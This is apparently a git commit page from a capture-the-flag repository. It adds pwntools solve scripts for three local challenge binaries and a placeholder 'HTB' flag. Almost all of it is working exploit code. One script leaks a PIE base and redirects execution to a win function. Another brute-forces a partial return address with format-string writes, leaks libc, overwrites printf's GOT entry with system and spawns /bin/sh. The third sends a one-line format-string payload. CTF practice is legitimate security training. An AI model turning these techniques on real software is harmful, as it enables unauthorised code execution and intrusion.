solve script

binary
solve script
2025-07-29 01:35:56 +03:00 · 2025-07-29 01:35:20 +03:00 · 2025-05-11 22:17:10 +03:00 · 2025-05-11 22:16:34 +03:00 · 2025-03-27 23:58:07 +03:00 · 2025-03-27 23:57:54 +03:00
9 changed files with 120 additions and 0 deletions
@@ -0,0 +1,36 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./contractor", checksec=False)
+
+while True:
+	r = process()
+
+	# funcs
+	s = lambda a,b: r.sendafter(a, b)
+	sl = lambda a,b: r.sendlineafter(a, b)
+	fill = lambda a: [sl(b"> ", i) if b"\n" in a else s(b"> ", i) for i in a]
+	opt = lambda a,b: (sl(b"> ", a), sl(b": ", b))
+
+	# leak
+	fill([b"mug3njutsu\n", b"none\n", b"13\n", b"ofcourse"+b"C"*8])
+	r.recvuntil(b"C"*8)
+	target.address = u64(r.recv(6).ljust(8, b"\x00")) - 0x1b50
+	log.info("pie: %#x", target.address)
+
+	# write
+	opt(b"4", b"A"*28+p32(0)+b"\x40")
+	sl(b"> ", b"no")
+	opt(b"4", p64(target.sym.contract))
+	
+	r.recvuntil(b"lad!\n\n")
+
+	try:
+		r.sendline(b"id")
+		if r.recvline():
+			break
+	except EOFError:
+		pass
+
+r.interactive()
@@ -0,0 +1 @@
+HTB{f4k3_fl4g_f0r_t35t1ng}
@@ -0,0 +1,69 @@
+#!/usr/bin/python3
+
+from pwn import *
+import re
+
+context.binary = target = ELF("./chal", checksec=False)
+libc = target.libc
+
+# bruteforce lower 12 bits
+def brute():
+	for a in range(1, 256):
+		for b in range(8, 256, 16):
+			r = process()
+			partial_ret = (a << 8) | b
+			write = (0x61 - (partial_ret & 0xff)) & 0xff
+			buf = b"%c"*16 + f"%{partial_ret-16}c%hn".encode()
+			buf += f"%{write}c%48$hhn".encode()
+			r.sendlineafter(b": ", buf)
+			try:
+				r.recvuntil(b"Type")
+				return r, partial_ret
+			except:
+				r.kill()
+				continue
+
+# leak
+r, partial_ret = brute()
+log.info("ret: %#x", partial_ret)
+buf = f"%97c%48$hhn".encode()
+buf += b"AAAA%17$p.%19$p"
+r.sendlineafter(b": ", buf)
+r.recvuntil(b"AAAA")
+leaks = re.findall(r'0x[a-z0-9]+', r.recvS())
+libc.address = int(leaks[0], 16) - 0x29d68
+log.info("libc: %#x", libc.address)
+target.address = int(leaks[1], 16) - 0x1169 
+log.info("elf: %#x", target.address)
+
+# write
+partial_ret = int(hex(libc.sym.system)[-4:], 16)
+buf = f"%{partial_ret}c%12$hn".encode().ljust(16, b"A") + b"%110c%48$hhn".ljust(16, b"A") + p64(target.got.printf)
+r.sendline(buf)
+r.sendline(b"/bin/sh")
+
+r.interactive()
+
+"""
+# write
+partial_ret = 0xe068
+write = (0x61 - (partial_ret & 0xff)) & 0xff
+buf = b"%c"*16 + f"%{partial_ret-16}c%hn".encode()
+buf += f'%{write}c%48$hhn'.encode()
+s(buf)
+
+# leak
+buf = f"%97c%48$hhn".encode()
+buf += b"AAAA%17$p.%19$p"
+s(buf)
+r.recvuntil(b"AAAA")
+leaks = re.findall(r'0x[a-z0-9]+', r.recvS())
+libc.address = int(leaks[0], 16) - 0x29d68
+target.address = int(leaks[1], 16) - 0x1169 
+log.info("elf: %#x", target.address)
+
+# write
+partial_ret = 0x38f0
+buf = f"%{partial_ret}c%12$hn".encode().ljust(16, b"A") + b"%110c%48$hhn".ljust(16, b"A") + p64(target.got.printf)
+r.sendline(buf)
+"""
@@ -0,0 +1,14 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./hide", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# buf
+s(b"%160c%hhn%6$s")
+
+r.interactive()
Author	SHA1	Message	Date
jc	8009ca1f5f	solve script	2025-07-29 01:35:56 +03:00
jc	e05b881fa7	binary	2025-07-29 01:35:20 +03:00
jc	88c88f3a62	solve script	2025-05-11 22:17:10 +03:00
jc	483f58ba63	binary	2025-05-11 22:16:34 +03:00
jc	b98813ca8a	solve script	2025-03-27 23:58:07 +03:00
jc	4ea52ad817	fake flag	2025-03-27 23:57:54 +03:00
jc	a7ad2fc055	libraries	2025-03-27 23:57:42 +03:00
jc	90dcd7da8b	binary	2025-03-27 23:57:31 +03:00